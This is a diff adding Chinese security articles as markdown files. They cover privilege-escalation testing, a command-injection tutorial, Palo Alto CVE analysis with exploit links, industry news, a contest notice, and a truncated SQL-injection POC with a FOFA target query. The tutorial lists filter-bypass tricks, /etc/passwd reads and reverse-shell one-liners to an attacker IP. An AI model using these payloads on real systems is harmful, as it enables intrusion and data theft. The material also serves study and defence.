+这里全局搜索下查询的接口,很明显可以看到接口的作用是用来编辑的 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNqj6JRXPxCiamU0sa9et6oC5iaicfwgteJtOPPOibBqo8ORIbX5uF1pxokw/640?wx_fmt=png&from=appmsg "") + +然后通过查询的接口可以看到字段相关信息 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNRpZH5zKyylibpmibt9de01eNPKYCvGUrJh2BZq9nvadBLYemib1JnIQ4Q/640?wx_fmt=png&from=appmsg "") + +直接替换接口,复制上面的字段构造数据包,字段值随便修改,回显操作成功 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNprR4Y2GI0GoSUQ2Psw62Xs9XZYjwVVbhkzrcwLicGGsYMbbWTZtoPfA/640?wx_fmt=png&from=appmsg "") + +然后通过越权查询可以看到数据已经被修改了 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNFXkahFQAF2Dvia68HNQGkJmeyD59HSeqRKsqyBDKEhBKZIHLBxwWMvw/640?wx_fmt=png&from=appmsg "") + +对于删除增加的接口都是一样的利用思路,如果有高权限的账号的话,可以直接在低权限没有的功能点进行抓包,然后将cookie替换为低权限用户的,还是正常返回就是存在漏洞 + +**垂直越权2** + +本来无任何功能点,注册之后需要审核,但是前端泄露了很多接口 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0ZkIpy7kkXd47kYKKZLkYR5ibWSnkR1F3QlDlicic4Prnshic4SjzEdfETg/640?wx_fmt=png&from=appmsg "") + + +返回管理员账号的一些信息 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0cup2dXSibxiaKFO1sKatH02No1ENnyqyeqHmiasOLYoUNEhMqayJjo0FA/640?wx_fmt=png&from=appmsg "") + + +按照上一个案例的方法可以越权增加删除等操作 + +对于一些小程序、app就需要反编译去找一找接口测试,请求参数肯定是在客户端,总能找到 + + +**利用模糊查询越权** + +查询的功能点,这里没有任何数据 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0vWk17ecoTiaSskFLUW63udibR7S4Gd8WTclSiakecCUVAquLQ9nb6kLoQ/640?wx_fmt=png&from=appmsg "") + +参数值为学号 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0VPP7AboDOnajVUtFLdQVpCXS7lLoS8Yq43xKyYzA0vRp14RJ787MAw/640?wx_fmt=png&from=appmsg "") + +这里后端大概率使用了模糊查询,直接修改为%放包,%代表匹配所有 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0IlNmyT66V1IZibUPGhjBwzZ3t2MFyy3N0U3RdeLnxbjD3mvl36VJeTg/640?wx_fmt=png&from=appmsg "") + +返回了大量敏感信息 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0TaCnYtIXmvzwYESZqFKJOkZ5AU4MpDdzsic6Y2yBsJHQtqiak7oibibS2Q/640?wx_fmt=png&from=appmsg "") + +**绕过前端限制** + +包挨骂的水洞专用漏洞:如下图,只能选择这些里面的系统 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0CNibsTaRS5KlIDsE5fKS5QmdyYiboWLROeibZMsdjKhKeMV1efeKqhd8Q/640?wx_fmt=png&from=appmsg "") + +这里点击保存,把能改的全改成111,假如没有申请人工号这个参数,也可以想办法找到之后手动添加,看看会不会被修改 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0dk3xvbSb730oXZlicibmzM3iaoEibFWsERWG67x3iaB5TM9CJenicqhMkYqQ/640?wx_fmt=png&from=appmsg "") + +可以看到系统已经选择了111,上面不能修改的申请人也变成了111 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0l1y98hA7bILr2TbkDAwaiaRVNiahiaJA2KkeRoX3EASFYuyasddkp9SFw/640?wx_fmt=png&from=appmsg "") + +我这里只是保存草稿讲一下思路,实际还需要提交看看是否提交成功,大概率是能成功的 + diff --git a/doc/命令执行漏洞基础.md b/doc/命令执行漏洞基础.md new file mode 100644 index 00000000..01505f38 --- /dev/null +++ b/doc/命令执行漏洞基础.md @@ -0,0 +1,495 @@ +# 命令执行漏洞基础 + 长风实验室 2024-11-20 10:31 + +# 一、原理 +#### 1.命令执行 + +**命令执行(Remote Command Execution, RCE)** + +Web应用的脚本代码在执行命令的时候过滤不严,从而注入一段攻击者能够控制的代码在服务器上以Web服务的后台权限远程执行恶意指令 + +**成因** + +·  +代码层过滤不严 + +·  +系统的漏洞造成命令注入 + +·  +调用的第三方组件存在代码执行漏洞 + +·  +常见的命令执行函数 + +PHP:exec、shell_exec、system、passthru、popen、proc_open等 + +ASP.NET:System.Diagnostics.Start.Process、System.Diagnostics.Start.ProcessStartInfo等 + +Java:java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec等 + +#### 2.代码执行 + +代码执行漏洞由于服务器对危险函数过滤不严导致用户输入的一些字符串可以被转换成代码来执行从而造成代码执行漏洞 + +成因 + +  +用户能够控制函数输入 +存在可执行代码的危险函数 + +常见代码执行函数 + +PHP: eval(),assert(),call_user_func(),create_function(),array_map(),call_user_func_array(),array_filter(),uasort(),preg_replace() + +Javascript: eval + +Vbscript:Execute、Eval + +Python: exec + +#### 3.命令执行与代码执行的区别 + +1.命令注入则是调用操作系统命令进行执行 + +2.代码执行漏洞是靠执行脚本代码调用操作系统命令 +#### 4.危害 + +可以执行代码、系统命令进行文件读写,文件上传、反弹shell等操作 +### 二、代码执行函数 +#### 1. eval() + +1.eval() 函数把字符串按照 PHP 代码来计算。 + +2.该字符串必须是合法的 PHP 代码,且必须以分号结尾。 + +**使用eval()函数有时候需要添加 ?>** + +原因是eval()函数相当于执行php的代码,而 +#### 3. exec + +不输出结果返回执行结果的最后一行可以使用output进行输出 + + +#### 4. passthru + +此函数只调用命令并把运行结果原样地直接输出没有返回值。 + + +#### 5. shell_exec + +不输出结果,返回执行结果使用反引号(``)时调用的就是此函数 + + +#### 6. ob_start + +此函数将打开输出缓冲当输出缓冲激活后,脚本将不会输出内容(除http标头外)相反需要输出的内容被存储在内部缓冲区中。 + +内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中想要输出存储在内部缓冲区中的内容,可以使用 ob_end_flush() 函数另外, 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容 + + +#### 7. 命令连接符 + +Windows和Linux都支持的命令连接符: + +cmd1 | cmd2 只执行cmd2 + +cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行 + +cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2 + +cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2 + +Linux还支持分号; + +cmd1 ; cmd2 +  +按顺序依次执行,先执行cmd1再执行cmd2 +### 四、绕过姿势 +#### 1. 关键字绕过 + +输出函数 + +cat + +tac + +more + +less + +head + +tac + +tail + +nl   #nl  # > 在Linux是追加并覆盖文件的意思,使用该命令需要写的权限 + +${IFS} + +$IFS$9 + +%0a + +%09  (反引号中只能用%09绕过) + +%20 + +%3c + +$@            # cat$@t flag + +$1-$9        # cat$1t flag + +${数字}      # cat${1}t flag + + +$IFS在linux下表示分隔符加一个{}固定了变量名同理在后面加个$可以起到截断的作用 + +$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串 +#### 4. 命令终止符 + +%00 + +%20 +#### 5. 通配符 + +* 字符被过滤,用 +“ +* +” +号(通配符)代替,如fla* ,通过测试不能与IFS或<这两个字符一起使用 + +'' , +“” +单引号和双引号截断绕过,如fl''ag.php + +“ +? +” +可替代单个字符。 +“ +* +” +可替代任意字符,如fla?.php + +. 如php被过滤,可以 用 p +“ +. +” +hp +#### 6. 反斜杠 + +ca\t f\la\g.php +#### 7. PHP短标签 + +PHP的标签有至少四种:、<% %>(ASP风格)、<%= %>。 + + +"的支持需要short_open_tag=On,要在XML中使用PHP,需要禁用此标签。 + + +"<%%>"的支持需要asp_tags=On。 + + +""总是有效的,无论short_open_tag是否设置。 + + +除了其他的标签在PHP7.0.0中被移除,强烈建议使用标签,代码才能更好的兼容性。 +#### 8. 敏感字符绕过 +##### l 变量绕过 + +a=l,b=s; +b +##### l base64编码绕过 + +echo 'cat' | base64 + +`echo 'Y2F0Cg==' | base64 -d` test.txt +##### l 文件包含绕过 + +c=eval($_GET[a]);&a=system('cat fla*'); + +c=eval($_GET[a])?>&a=system('cat fla*');#如果过滤了分号,可以用?> 闭合进行绕过 + +编码绕过:include$_GET["x"];&x=php://filter/read=convert.base64-encode/resource=flag.php +##### l 无参数函数绕过 + +数组操作 + +array_flip() #交换数组中的键和值 + +array_rand() #从数组中随机取出一个或多个单元 + +array_reverse() #返回一个单元顺序相反的数组 + +current() #返回数组中的当前单元 + +文件操作 + +file_get_contents() #将整个文件读入一个字符串 + +readfile() #读取文件并写入到输出缓冲。 + +highlight_file() [别名:show_source()] #语法高亮一个文件 + +scandir() #列出指定路径中的文件和目录 + +direname() #给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。 + +getcwd() #取得当前工作目录。 + +chdir($directory) #将 PHP 的当前目录改为 directory。 + +读取环境变量 + +get_defined_vars() #此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。 + +getenv() #获取一个环境变量的值 + +localeconv() #返回一包含本地数字及货币格式信息的数组,第一个值一直是. + +phpversion() #获取当前的PHP版本 + +会话 + +session_id() #获取/设置当前会话 ID + +session_start() #启动新会话或者重用现有会话 + +其它 + +chr():返回指定的字符。 + +rand():产生一个随机整数。 + +time():返回当前的 Unix 时间戳。 + +localtime():取得本地时间。 + +localtime(time()) 返回一个数组,Array [0] 为一个 0~60 之间的数字。 + +hex2bin():转换十六进制字符串为二进制字符串。 + +ceil():进一法取整。 + +sinh():双曲正弦。 + +cosh():双曲余弦。 + +tan():正切。 + +floor():舍去法取整。 + +sqrt():平方根。 + +crypt():单向字符串散列。 + +hebrevc:将逻辑顺序希伯来文(logical-Hebrew)转换为视觉顺序希伯来文(visual-Hebrew),并且转换换行符。 + +hebrevc(crypt(arg)) [crypt(serialize(array()))]:可以随机生成一个 hash 值 第一个字符随机是 $(大概率) 或者 .(小概率) 然后通过 ord chr 只取第一个字符。 + +ord:返回字符串的第一个字符的 ASCII 码值。 +##### l 未定义的初始化变量 + +cat$b /etc/passwd +##### l 连接符 + +cat /etc/pass'w'd + +例子ls命令我们可以通过以下语法代替执行 + +/???/?s --help +#### 9. 反向连接(Reverse Shell)的各类技术方法 + +- ; perl-e 'use Socket;$i="192.168.80.30";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};' + + +- ; python-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.80.30",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' + + +- ; php-r '$sock=fsockopen("192.168.80.30",443);exec("/bin/sh-i<&3 >&3 2>&3"); +’ + + +- ; ruby-rsocket-e'f=TCPSocket.open("192.168.80.30",443).to_i;execsprintf("/bin/sh-i<&%d >&%d 2>&%d",f,f,f)' +#### 10. 一些场景应用 + +1、无任何过滤或简单过滤 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfgiajYDQPP2IbZwhDtUqga6clian9xEW0nnibCPZjUXfPtwxqMibnVXamSw/640?wx_fmt=png&from=appmsg "") + +2、过滤了;,|,&,` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfT8yFETGJ6v9c3rLte5qSxsmBibgic7uia8ZVGJfianeHpqssp4EDDiaEF7g/640?wx_fmt=png&from=appmsg "") + + +3、过滤了;,|,&,`,\s + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfc3oREgLic155AoibdJdLdjcgxZ0kyHOic5UpGKezYNeibTm10Len9DY2tg/640?wx_fmt=png&from=appmsg "") + + +4、过滤了关键词,比如cat + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfUTKrtgToCiaDdUvyHYOVCSx4Hnnrz2XzGgCgtgk7kcEnZgGb2Rju7QQ/640?wx_fmt=png&from=appmsg "") + + +5、页面无命令结果的回显 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfKtQdPJhx3kspz1iajhaVwYc1Uia3qCZckDZLjVPY9x80tIo22bo8Y5Jw/640?wx_fmt=png&from=appmsg "") + +**** +**五、****防范措施** + +尽量不要使用系统执行命令 + +在进入执行命令函数/方法前,变量要做好过滤,对敏感字符转义 + +在使用动态函数前,确保使用的函数是指定的函数之一 + +对PHP语言,不能完全控制的危险函数就不要用 + + diff --git a/doc/奇安信集团获2024年世界互联网大会杰出贡献奖.md b/doc/奇安信集团获2024年世界互联网大会杰出贡献奖.md new file mode 100644 index 00000000..055f4419 --- /dev/null +++ b/doc/奇安信集团获2024年世界互联网大会杰出贡献奖.md @@ -0,0 +1,61 @@ +# 奇安信集团获2024年世界互联网大会杰出贡献奖 + 奇安信集团 2024-11-20 10:06 + +11月20日,在2024年世界互联网大会乌镇峰会开幕式上, +**奇安信集团凭借其在网络安全领域的卓越成就与无限潜力,荣获“世界互联网大会杰出贡献奖”** +。 + +![](https://mmbiz.qpic.cn/mmbiz_png/G3LNmiaOGjarvRTnOw8TU9UZyeVumesZk7Z8utwVyiboybPIXHcZE1rpHFLwUmh9OxpwwSv7Slz0ChaicFx1lkxYQ/640?wx_fmt=png&from=appmsg "") + + +作为大会亮点之一,世界互联网大会国际组织今年全新设立“世界互联网大会杰出贡献奖”,以表彰在全球互联网相关领域做出杰出贡献的个人和企业, +全球仅有14家企业获此殊荣 +。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/G3LNmiaOGjarvRTnOw8TU9UZyeVumesZklibgh7HRm77zuU2cCbibXO53lCgDQhbKtDFwqLJ8ozHqhvSpEpr0ThuA/640?wx_fmt=jpeg&from=appmsg "") + +自2016年成立以来,奇安信集团始终深耕网络空间安全领域。2019年5月,中国电子战略入股奇安信,奇安信正式成为网络安全“国家队”;2020年7月22日,奇安信在科创板挂牌上市,开启了全新的发展阶段。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/G3LNmiaOGjarvRTnOw8TU9UZyeVumesZk7qtXBYOubAVJ6171A7yBG9ZJZjmhjZxxibInX5G1dOA2ibWpKgPu0IAQ/640?wx_fmt=jpeg&from=appmsg "") + +多年来,奇安信持续发展壮大,不仅在人员、收入规模和产品覆盖度上均位居行业第一,还[连续四年排名“CCIA 中国网安产业竞争力50强”榜单第一](http://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247617283&idx=1&sn=336e1dd4a8322b0944ff0d24911dca99&chksm=fb772d07cc00a411bb44809b2c92c1dc54661a911b81a6c666e7b73249970ad1af918094b8de&scene=21#wechat_redirect) +,并被评为北京市第一批“隐形冠军”企业。 + +作为2022年北京冬奥会、冬残奥会官方网络安全服务商,奇安信圆满完成了保障任务,实现了冬奥网络安全“零事故”的世界纪录。同时,奇安信积极开拓国际市场,持续推进产品国际化、服务能力国际化和市场能力国际化,并于2023年10月签下[迄今为止中国网络安全出海最大项目](http://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247599565&idx=1&sn=17cf5294eab2e4c95dd97bca33c1d421&chksm=fb7763c9cc00eadf71fb0a56345f286a938634b5d754bd141b2e47a0c3b8bf940b09f591c2cb&scene=21#wechat_redirect) +,为海外某国建设网安指挥系统,签约金额近 3亿元人民币,项目有望成为“一带一路”国家标杆项目,推动中国网络安全产业进一步走向世界。 + +随着“十四五”规划的深入实施和数字化转型的全面铺开,网络安全需求呈现井喷式增长。作为行业领军者,奇安信将紧跟时代步伐,针对新技术带来的新业态、新业务和新场景,不断创新网络安全解决方案,为政府、企业等用户提供更加全面、有效的安全保障。 + +展望未来,奇安信将继续秉承初心与使命,以成为“全球第一的网络安全公司”为愿景目标,不断奋进、勇攀高峰,为构建更加安全、可信的网络空间贡献自己的力量。 + +**附2024年世界互联网大会杰出贡献奖获奖企业名单****(排名不分前后)** +: + +    奇安信集团 + +    中国电信集团有限公司 + +    国家电网有限公司 + +    阿里巴巴(中国)有限公司 + +    腾讯公司 + +    超威半导体公司(AMD) + +    中兴通讯股份有限公司 + +    蚂蚁科技集团股份有限公司 + +    澳门电讯有限公司 + +    荣耀终端有限公司 + +    科大讯飞股份有限公司 + +    印象(上海)数字科技有限公司 + +    福瑞泰克智能系统有限公司 + +    海光信息技术股份有限公司 + diff --git a/doc/平板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md b/doc/平板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md new file mode 100644 index 00000000..f5cfae48 --- /dev/null +++ b/doc/平板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md @@ -0,0 +1,69 @@ +# 平板锅(Palo Alto)防火墙0day 漏洞分析及Exp + 独眼情报 2024-11-20 07:42 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/KgxDGkACWnRqibw3tpUKVREPB4zJ1Fa1C8OGJoIVbVHBpXHfDgwUHRphXZPalsqVNE18kXTVJwWFohqquuRuVug/640?wx_fmt=png&from=appmsg "") + +watchTowr的研究人员Sonny近期发布了一份技术分析报告,深入剖析了影响Palo Alto Networks下一代防火墙(NGFW)的两个零日漏洞。这两个漏洞编号为CVE-2024-0012和CVE-2024-9474,已引起包括美国网络安全和基础设施安全局(CISA)在内的多个网络安全机构的高度关注。CISA已将其列入已知漏洞目录,并要求联邦机构必须在12月9日前完成修复。 + +CVE-2024-0012是PAN-OS管理Web界面中的一个认证绕过漏洞。根据Sonny的分析,该漏洞允许远程攻击者在无需认证的情况下获得管理员权限。研究人员详细说明了他们的分析方法,从仔细审查Nginx配置文件开始。 + +Sonny在分析报告中指出:"查看主要的Nginx路由配置文件/etc/nginx/conf/locations.conf时,发现了一处看似很小但影响巨大的变更。" +``` +add_header Allow "GET, HEAD, POST, PUT, DELETE, OPTIONS"; + if ($request_method !~ ^(GET|HEAD|POST|PUT|DELETE|OPTIONS)$) { +   return 405; + } +  ++proxy_set_header X-Real-IP ""; ++proxy_set_header X-Real-Scheme ""; ++proxy_set_header X-Real-Port ""; ++proxy_set_header X-Real-Server-IP ""; ++proxy_set_header X-Forwarded-For  ""; ++proxy_set_header X-pan-ndpp-mode ""; ++proxy_set_header Proxy ""; ++proxy_set_header X-pan-AuthCheck 'on'; + + + # rewrite_log on; +  + # static ones +@@ -27,6 +17,5 @@ location /nginx_status { + location ~ \.js\.map$ { +   add_header Cache-Control "no-cache; no-store"; +   proxy_pass_header Authorization; ++  include conf/proxy_default.conf; +   proxy_pass http://$gohost$gohostExt; + } + +``` + +研究人员发现,在未打补丁的版本中,X-PAN-AUTHCHECK头部设置存在缺陷,这可能导致未经授权的用户访问本应受保护的端点。 + +通过利用这个疏忽,研究人员找到了一个简单但破坏力极强的绕过方法:只需将X-PAN-AUTHCHECK HTTP头部设置为off,就能完全禁用认证机制。 + +第二个漏洞CVE-2024-9474则允许恶意的PAN-OS管理员提升权限,以root身份执行命令。该漏洞存在于AuditLog.php文件中,由于用户输入未经proper过滤,导致可能遭受命令注入攻击。 + +研究人员在负责写入审计日志的函数中发现了一处关键性更改。Sonny演示了如何利用这个漏洞提升权限,他表示:"用户竟然可以传入包含shell元字符的用户名到AuditLog.write()函数中,这些字符随后会被传递给pexecute()函数。" + +Sonny敦促管理员们迅速采取行动,并指出这个漏洞利用链的简单性:"这两个漏洞能够出现在生产环境的设备中着实令人吃惊,更让人惊讶的是它们是通过Palo Alto设备底层那堆杂乱的shell脚本调用实现的。" + +为了给管理员留出打补丁的时间,watchTowr暂时没有公布完整的概念验证利用代码,但他们提供了一个Nuclei模板用于检测系统是否存在漏洞。 + +另一方面,安全研究员Valentin Lobstein已经开发并发布了CVE-2024-0012和CVE-2024-9474的PoC利用代码,使得漏洞利用变得极其简单。基于watchTowr的分析,Lobstein开发的Go语言工具实现了攻击过程的自动化,用户只需输入目标URL即可。这个现成的利用工具增加了遭受攻击的风险,也凸显了及时修补易受攻击系统的紧迫性。 + +Palo Alto Networks已在PAN-OS 10.2.12-h2版本中修复了这些漏洞。 +> +> watchTowr详细分析:https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ + +> +> nuclei检测模板:https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012 + +> +> Exp利用代码:https://github.com/Chocapikk/CVE-2024-9474 + +> +> 请合法合规使用,任何乱用与本公众号无关,本公众号出于研究学习目的分享。 + + + + diff --git a/doc/第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示.md b/doc/第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示.md new file mode 100644 index 00000000..aad3374d --- /dev/null +++ b/doc/第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示.md @@ -0,0 +1,132 @@ +# 第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示 +原创 安钥 方桥安全漏洞防治中心 2024-11-20 10:00 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTssPYkVD6hiaic2K8YSOmpOJXKdlHibXMReTib5oPndcpWJyDiabtofHJsJtrR1ibic87y12Qqlvyop8C8Kw/640?wx_fmt=png&from=appmsg "") +# 锤炼安全金钥,共筑安全防线 +# 安钥®「漏洞处置标准作业程序(SOP)」征文启示 +# 第13期 + +11月20日 - 11月30日 +# 【 活 动 主 题 】 + +数字时代浪潮奔涌而来,网络安全已成为国家、企业和个人必须重视的工作。 + +每个漏洞都可能成为网络攻击的突破口。 + +修补漏洞的过程经常充满挑战,如同一把把锈蚀难开的锁。 + +漏洞处置标准作业程序(SOP)就是我们全力锤炼的金钥匙,旨在高效处置漏洞,筑牢安全防线。 + +谨以此文,诚邀您参加 +**“安钥®「漏洞处置标准作业程序(****SOP****)」征文”** +活动,分享您的经验和智慧,帮助国家、企业、社区、家庭、个人更有效地防范网络安全风险。 +# 【 目 标 作 者 】 +- 网络安全专业人员 + +- 软件开发人员 + +- IT运维人员 + +- 能分享安全漏洞处置经验的任何专业人士 + +# 【 活 动 特 点 】 +- **实战导向:** +定期收集漏洞情报,如必修漏洞、关键漏洞、严重影响业务的漏洞、Day 1 漏洞等,针对这些漏洞征集「漏洞处置SOP」,总结和分享真实工作场景中收获的经验和教训。 + +- **专业指导:** +提供两篇已验证的的SOP样例,SOP模板,SOP编写方法与过程。 +[三步写好「漏洞处置SOP」](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484146&idx=1&sn=d5a39e4fad74df928be97dd1a952d040&chksm=c3593397f42eba81b49be3fd473da1c85c88ea8507ca69f7852cd8801064e27594684dde7f76&scene=21#wechat_redirect) +供你参考,助你快速上手。 +(文末添加运营助手获取样例) + +- **现金奖励****:** +评审合格的SOP将获得 +**300元~500元** +稿酬。后续还将从合格SOP中评选出优秀作品,奖金 +**最高可达1,000元** +。 + +- **长期签约:** +每期的前3名有机会成为签约作者,长期合作共赢。 + +- **公开发布:** +所有入选作品在公众号发布,并推荐到安全专业新媒体平台展示,署名作者持续积累专业声誉。 + +# 【 征 文 形 式 】 + +本身我们提供 10 个安全漏洞处置的标准作业程序(SOP)框架稿,在此基础上你需要依照 +**“修补方案”** +实施并记录,具体方式包括: +**升级、打补丁、修改配置** +等。 + +你可从这 10 份框架稿中任选一份或者多份,自行搭建环境实施修复方案,并详细记录修补漏洞的过程,说明具体的操作步骤和系统输出(需配图),基于修补漏洞的过程编写 +**“详细漏洞处置步骤”** +后,通过邮件提交。 + +参考:[编写「漏洞处置SOP」的方法与要点](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484146&idx=1&sn=d5a39e4fad74df928be97dd1a952d040&chksm=c3593397f42eba81b49be3fd473da1c85c88ea8507ca69f7852cd8801064e27594684dde7f76&scene=21#wechat_redirect) + +# 【 征 文 要 求 】 +1. **原创:** +投稿作品必须为本人编写,不得抄袭,不得洗稿等。一经发现,取消资格。 + +1. **实用:** +依据修复方案,详细记录漏洞修复过程,说明详细操作步骤(配图)、验证及后续跟踪等关键环节,确保漏洞处置过程完整、清晰、可操作。 + +1. **规范:** +行文注意逻辑严谨,文字流畅。合理使用标题、段落、列表等样式组织内容,确保易于阅读。(参考样例:[漏洞修复SOP | 处置ESXi 6.7(VMware ESXi 6u7a)的一系列安全漏洞](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247483946&idx=1&sn=e1a4ea2f8e2e13f3384ee76ec45942f1&chksm=c359334ff42eba5997b93f18249e498a12fd09efacba3f0366297924517748e4678d902299f5&scene=21#wechat_redirect) +) + + > 在上述3点基础上,鼓励创新。< +1. **创新:** +体现在制订/设计漏洞处置方案以达到比常规方案更好的效果。如:花的时间更短,部分自动化,提供shell脚本,采用新技术(新工具)获得更好的效果等。 + +# 【 投 稿 方 式 】 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTuT4RLIjIWr2ywFIIEH968icC8OHxSpR7FtR2L5dAhJ0fkVE9T7y3FFZRSibW9BbyoPn3DmY0uKEPkw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +1. **添加运营助手:** +下方扫码添加运营助手,注明 +**“SOP”** +,获取参赛附件。 + +1. **电子投稿:** +请将投稿作品以Word或PDF格式提交至邮箱 +**SOP123#tingqiao_net** +,邮件标题请注明 +**“漏洞处置SOP征文活动+署名+作品标题”** +。(注:为减少垃圾邮件,请将"#"替换成"@",将"_"替换为".") + +1. **截止日期:** +2024年11月30日(周六)23:59前 + +1. **结果公布:** +2024年12月7日(周六) + +扫码添加运营助手获取参赛附件 +▽ + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTs0BYdgedlDZlsLV4xZ0ibUnRljKAMsTq37lxLQCBBuo5pgf5iahvEaL4rAfHY9wR2fyE2M8e9V2k4g/640?wx_fmt=png&from=appmsg "") + +本征文活动的解释权归上海方桥信息技术有限公司所有。 + + +**往期入选公布** + + +[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第一期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484176&idx=1&sn=075c87d06e177c5cfc335bc6dbcf67dd&chksm=c3593275f42ebb63192e174945ba9a5af5b6d8aa45b384f4328accb7638f87122b31ab831173&scene=21#wechat_redirect) + + +[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第二期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484220&idx=1&sn=3c76a50ede2f7968337f251cdacd34ce&chksm=c3593259f42ebb4f628b691fe3967f35acbff64cce9bdd5815c335b3d435effe2224ba59cf64&scene=21#wechat_redirect) + + +[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第八期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484325&idx=1&sn=de7186ee2bde1a9178df7086cf65b1d9&chksm=c35932c0f42ebbd6e7f6217837931f17af287900a429dbe5f34b293b9f16e42a57d4ea678c14&scene=21#wechat_redirect) + + +[入选作品公布|安钥®「漏洞处置标准作业程序(SOP)」征文第九期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484336&idx=1&sn=5b5f56173e65a5aed2c40f5ef1290968&chksm=c35932d5f42ebbc342a74cacca178be54d2b6b08d095ad1dd1177b75f0998799fffd011e6ba6&scene=21#wechat_redirect) + + +欢迎关注公众号 + +▽ + + diff --git a/doc/紫光档案管理系统 mergeFile SQL注入漏洞.md b/doc/紫光档案管理系统 mergeFile SQL注入漏洞.md new file mode 100644 index 00000000..ad82d3f6 --- /dev/null +++ b/doc/紫光档案管理系统 mergeFile SQL注入漏洞.md @@ -0,0 +1,46 @@ +# 紫光档案管理系统 mergeFile SQL注入漏洞 +原创 CatalyzeSec CatalyzeSec 2024-11-20 11:24 + +# FOFA +``` +app="紫光-档案管理系统" +``` +# POC +``` +POST /Archive/ErecordManage/mergeFile HTTP/1.1 +Host: +Cache-Control: max-age=0 +Accept-Language: zh-CN +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: 